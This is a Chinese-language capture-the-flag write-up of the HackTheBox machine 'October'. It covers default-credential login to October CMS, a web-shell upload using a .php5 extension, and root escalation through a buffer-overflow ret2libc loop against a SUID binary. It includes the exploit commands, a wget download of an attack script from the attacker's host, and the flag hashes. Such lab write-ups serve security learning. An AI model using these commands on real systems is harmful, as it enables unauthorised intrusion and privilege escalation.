信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.16 | TCP:22,80 |
$ nmap -p- 10.10.10.16 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: October CMS - Vanilla
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
October-CMS
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图](https://img.4awl.net/img/24/328d9bdf2de614434661c85d07d779.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图")
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图1](https://img.4awl.net/img/37/ece4bd9b86c4022a13631bd734473f.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图1")
username:admin password:admin
Admin Login
http://10.10.10.16/backend/backend/auth/signin
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图2](https://img.4awl.net/img/f3/1da0b585842e6430d24863c33d38e0.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图2")
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图3](https://img.4awl.net/img/97/0698d534447c8093fd366e18d666f0.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图3")
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图4](https://img.4awl.net/img/eb/7182dca9a136af4414bd6e4185352d.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图4")
http://10.10.10.16/backend/cms/media
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图5](https://img.4awl.net/img/3b/2513c625192e56ad163a1ea00aa831.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图5")
通过上传php5后缀文件绕过
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图6](https://img.4awl.net/img/ea/cc116883b5e0d28bc1c2c015ee1c23.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图6")
http://10.10.10.16/storage/app/media/p0wny.php5
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图7](https://img.4awl.net/img/ac/9d54fd89c9f25c74ac5623a94cdcea.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图7")
User.txt
2e2e813cc41a0812857cb7e7cdb5daa3
权限提升 & BOF
SUID File 32Bit
www-data@october:/var/www/html/cms/storage/app/media$ find / -perm -4000 -type f 2>/dev/null
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图8](https://img.4awl.net/img/81/008860dede39eca941a393075a6a87.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图8")
$ gdb -q ./ovrflw
gdb-peda$ checksec
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图9](https://img.4awl.net/img/20/5d7cda9dfbbd64ffe80e8f9059de63.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图9")
-
CANARY : disabled
-
风险: 栈溢出攻击的风险增加。没有启用栈保护(Canary),意味着攻击者可以更容易地利用栈溢出漏洞来覆盖返回地址或其他关键数据,可能导致代码执行或控制流劫持。
-
-
FORTIFY : disabled
-
风险: 缓冲区溢出攻击的风险增加。未启用
FORTIFY_SOURCE,编译时未进行额外的边界检查,因此缓冲区溢出等内存破坏漏洞更容易被利用。
-
-
NX : ENABLED
-
降低的风险: NX 已启用,意味着数据段不能被执行,减少了攻击者通过注入和执行恶意代码(如 shellcode)的可能性。这是一种有效的保护机制。
-
-
PIE : disabled
-
风险: 代码重用攻击的风险增加。未启用位置无关可执行文件(PIE),意味着二进制文件在每次加载时使用固定的地址空间布局,使得攻击者更容易预测并利用内存地址,进行如返回导向编程(ROP)的攻击。
-
-
RELRO : Partial
-
风险: 部分内存重定位攻击的风险存在。Partial RELRO 仅对部分重定位表(如全局偏移表的一部分)提供保护,攻击者可能仍然可以通过覆盖未保护的 GOT 表项来劫持程序的控制流。
-
www-data@october:/var/www/html/cms/storage/app/media$ cat /proc/sys/kernel/randomize_va_space
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图10](https://img.4awl.net/img/b9/a25e7c8cd31c4216d93c7fdc736b28.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图10")
这表示系统启用了 完全地址空间布局随机化(ASLR),即最高级别的地址空间随机化。
Framework
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图11](https://img.4awl.net/img/c6/1ecbd44132fbc0cc533ab964465cb1.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图11")
Buffer Overflow && ROP
gdb-peda$ pattern_create 1000
gdb-peda$ run 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x' Starting program: /tmp/ovrflw 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图12](https://img.4awl.net/img/65/6070b8d39becb10aa531fb484609d7.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图12")
gdb-peda$ pattern_offset AA8A
偏移量112
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图13](https://img.4awl.net/img/d5/5e498f262e45ee9fa9c77a3491eb84.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图13")
www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw
https://github.com/MartinxMax/ROPS
ROP链自动构造,由于启用了ASLR,所以libc地址是变化的。所以我们需要循环尝试payload
www-data@october:/tmp$ wget http://10.10.16.17/rops.sh;chmod +x rops.sh
www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图14](https://img.4awl.net/img/7c/c07aef46489b2228b9df8bde8c7159.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图14")
www-data@october:/tmp$ while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done
![[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图15](https://img.4awl.net/img/2b/5fda6b22afebd78cfaf1aa351aab98.jpg "[Meachines] [Medium] October October-CMS+BOF-ROP链自…插图15")
Root.txt
85319abefab83f503bc66023fa1c3e42
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
